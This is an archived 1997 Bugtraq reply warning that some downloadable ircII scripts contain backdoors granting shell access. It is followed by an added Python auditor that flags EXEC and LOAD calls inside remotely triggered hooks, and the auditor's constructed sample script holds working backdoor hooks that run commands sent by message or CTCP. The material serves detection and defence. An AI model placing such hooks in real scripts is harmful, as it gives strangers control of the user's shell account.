Bugtraq mailing list archives
Re: IRC script trojan with Unix based clients
From: espel () LLAIC UNIV-BPCLERMONT FR (Roger Espel Llima)
Date: Mon, 2 Jun 1997 17:40:24 +0200
On Sun, Jun 01, 1997 at 11:20:40AM -0700, Leonid S Knyshov wrote:
> As of this moment, the only good sources for ircII scripts are at ftp://ftp.pimpz.org and ftp://bitchx.htoc.com
> You can trust the scripts from there.
pimpz.org has all of DeadelviS's archive, which is quite comprehensive but not free (or meant to be free) of scripts with backdoors. For example, running ftp://ftp.pimpz.org/irc/DeadelviS/script/paks/toolz.irc, or ftp://ftp.pimpz.org/irc/DeadelviS/script/paks/dreamscr_9.3.tar.gz is equivalent to giving access to your shell account to everyone else on IRC.
From that directory, deturbo, superpak, uus and zer0 are the ones I'd trust. Still, it's a bad idea to run a script you don't completely understand. I couldn't find a single script on the bitchx.htoc.com site; it appears to be all about the BitchX client, source and binaries.
> Meanwhile, an ircII script can be as powerful as a shell, please check on http://www.undernet.org the important FAQ file how to detect ircII backdoors, I believe it's also on pimpz.org ftp site.
I wrote that :)

http://www.eleves.ens.fr:8080/home/espel/irc-backdoor.faq
ftp://ftp.pimpz.org/irc/DeadelviS/misc/irc-backdoor.faq

It's a bit outdated, though.
> You might want to hack a client source a bit to disable DCC and/or CTCP commands. To be safe you can simply rename them and retain the functionality.
The command to disable if you're concerned about security is EXEC, mostly. CTCP is harmless, it just sends and reacts to messages with a special marker. If you're paranoid, disable DCC SEND and DCC GET too, but they're generally OK because they'll refuse to write to dotfiles. DCC CHAT is an order of magnitude safer than that, but you can get some versions of ircII to dump core by sending crap through a DCC CHAT, there might be an exploitable buffer overflow somewhere there (although it's most likely in the data segment).

Even if you remove EXEC, and whatever you do to the client itself (unless you remove LOAD, but that's crippling it quite a bit), you can't prevent people from loading backdoored scripts that will let other people have "IRC access", i.e. remotely control the client. From the point of view of the system's security, though, as long as the backdoor can't touch the shell, it's not too bad.

Roger

--
e-mail: espel () llaic univ-bpclermont fr, espel () unix bigots org
WWW page & PGP key: http://www.eleves.ens.fr:8080/home/espel/index.html
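The post's advice boils down to two checks a reader can apply to a script before loading it: does it use EXEC (shell access) or LOAD (pulling in more script), and is that use reachable from an ON hook that fires on input sent by other IRC users (MSG, CTCP, DCC CHAT and so on). The following heuristic auditor is an added example, not code from the post, the FAQ, or any ircII distribution; the hook names, the comment convention and the command-prefix forms (`/exec`, `^exec`) it recognises are assumptions about common ircII script style, and the sample script it scans is constructed for the demonstration.

```python
"""Heuristic audit of an ircII script for shell access and remote-control hooks.

Added example (not from the Bugtraq post). It flags EXEC and LOAD anywhere in
the script, and upgrades a finding to "remote-*" when the command sits inside
an ON hook triggered by data from other users, which is the shape of the
backdoors the post describes. ircII syntax details are assumptions: a command
word may be prefixed with '/' or '^' (silent), '#' starts a comment line, and
hooks look like  on ^msg "*" { ... }  or  on ^ctcp "% % SHELL *" exec ...
"""
import re
from typing import List, Tuple

# Hooks whose trigger is input sent by another IRC user (assumed list).
REMOTE_HOOKS = {"msg", "public", "notice", "ctcp", "ctcp_reply",
                "dcc_chat", "dcc_raw", "raw_irc"}

# A command word 'exec' or 'load', optionally prefixed with '/' or '^', that is
# not part of a longer identifier and not a variable such as $exec.
CMD_RE = re.compile(r'(?<![\w$.])[/^]*(exec|load)\b', re.IGNORECASE)
# 'on ^msg "*"' or '/on #ctcp -pat ...': the hook name follows any modifiers.
ON_RE = re.compile(r'^\s*/?on\s+[#^&\-]*([a-z_]+)', re.IGNORECASE)

Finding = Tuple[int, str, str]   # (line number, kind, offending line)


def audit_script(text: str) -> List[Finding]:
    """Return findings of kind 'exec', 'load', 'remote-exec' or 'remote-load'."""
    findings: List[Finding] = []
    hook = None     # name of the ON hook whose body we are currently inside
    depth = 0       # brace depth within that hook body
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith('#'):      # blank or comment (assumed syntax)
            continue
        m = ON_RE.match(line)
        if m and hook is None:
            hook = m.group(1).lower()
            depth = 0
        for cmd in CMD_RE.finditer(line):
            name = cmd.group(1).lower()
            remote = hook is not None and hook in REMOTE_HOOKS
            findings.append((n, ("remote-" + name) if remote else name, line))
        if hook is not None:
            # A hook ends when its brace block closes, or on the same line
            # when it was written without braces.
            depth += line.count('{') - line.count('}')
            if depth <= 0:
                hook = None
    return findings


def is_backdoor_candidate(text: str) -> bool:
    """True when EXEC or LOAD is reachable from a remotely triggered hook."""
    return any(kind.startswith("remote-") for _, kind, _ in audit_script(text))


# Constructed sample: a harmless-looking alias, a hidden remote EXEC hook keyed
# on a magic word, a CTCP-triggered shell, and a local (non-remote) exec.
SAMPLE = """\
# constructed sample script for the auditor
alias chops {
  mode $C +o $0-
}
on ^msg "*" {
  if ([$0] == [cmdz]) { exec $1- }
}
on ^ctcp "% % SHELL *" { ^exec -name sh $3- }
alias backup { exec tar czf ~/irc-backup.tgz ~/.ircrc }
"""

if __name__ == "__main__":
    for n, kind, line in audit_script(SAMPLE):
        print(f"line {n}: {kind:12s} {line}")
    print("backdoor candidate:", is_backdoor_candidate(SAMPLE))
```

The auditor is deliberately conservative in what it reports: a plain `exec` in an alias the user types themselves (the `backup` alias above) is listed so it can be reviewed, but only EXEC or LOAD reachable from a MSG, CTCP or DCC hook is counted as a backdoor indicator, matching the post's point that the danger is a script giving other people shell access. It does not follow aliases that wrap EXEC or evaluate `$` expansions, so a clean run is not proof of safety; it is a first pass before reading the script in full.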